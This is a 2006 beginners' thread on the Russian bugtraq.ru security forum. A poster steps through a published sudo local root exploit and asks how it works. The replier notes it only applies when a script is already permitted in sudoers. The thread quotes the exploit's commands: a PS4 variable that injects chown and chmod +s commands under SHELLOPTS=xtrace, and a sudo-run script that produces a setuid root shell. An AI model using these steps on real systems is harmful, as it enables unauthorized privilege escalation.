информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Сетевые кракеры и правда о деле ЛевинаАтака на Internet
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
 Умер Никлаус Вирт 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / beginners
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Господа, будьте снисходительны, не бросайтесь сразу штрафовать за, как вам кажется, глупые вопросы - beginners на то и beginners.
да, это на тот случай если разрешено какой-нить файл запускать через sudo 07.09.06 12:52  Число просмотров: 1234
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
<"чистая" ссылка> <обсуждение закрыто>
<beginners>
Sudo local root escalation privilege 06.09.06 17:27  
Автор: TRESPASSER[CfK] Статус: Незарегистрированный пользователь
Отредактировано 07.09.06 12:08  Количество правок: 3
<"чистая" ссылка> <обсуждение закрыто>
Поправьте если что то не так понимаю (цитаты из ссылки - см.)
поправки личные =D. наверно не отличные.
создаем x.sh следующего содержания (я понимаю что сат это не делает, но у меня нет этого х.sh)
//cut

#!/bin/bash -x
echo "Getting root!!"

//cut
при событии !/bin/bash -x выводим getting root;
потом потом непонятным образом (без прав) нужно менять /etc/sudoers
//cut

breno ALL=(ALL) /home/breno/x.sh

//cut
как это делать если его даже смотреть(как в примере) нельзя - непонятно;
далее пишем "яйцо" =)(наверно пасхальное) и тут же компилим - тут проблем нет
потом ставим переменные окружения (зачем - не знаю, прокомментируйте plz)
//cut

setenv SHELLOPTS xtrace
setenv PS4 '$(chown root:root egg)'

//cut
зачем xtrace? причем явно видно что во второй наверно инжектится каким то образом команда смены "владельца" для нашего "яйца";
далее - запускаем скрипт ч\з sudo
//cut

sudo ./x.sh

//cut
после чего владельцем "яйца" становиться root; опять меняем загадочную переменную PS4 в которой уже теперь меняются права на доступ к "яйцу"
//cut

% setenv PS4 '$(chmod +s egg)'

//cut
все... теперь после запуска мы получаем шелл который прописан у нас в "яйце"
только что то у меня даже владелец не поменялся. Да - версия sudo у меня подходит.
тут вот только понял -## You need sudo access execution for some bash script
это он про х.sh что ли? а как я узнаю какой у меня разрешен? и опять же как я его поменяю(х.sh) вруг у него владелец root? (или обрабатывать это событрие ненадо - правда зачем кричать что мы тут делаем), и почему именно сишным шеллом менять этот загадочный shellopts? что он такое вообще?
дополнение от 07,09 - вообщем я так понял если у меня нет в sudoers какого нибудь скрипта для моего аккаунта разрешенного то нечего и пытаться?

http://milw0rm.com/exploits/1310
да, это на тот случай если разрешено какой-нить файл запускать через sudo 07.09.06 12:52  
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
<"чистая" ссылка> <обсуждение закрыто>
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach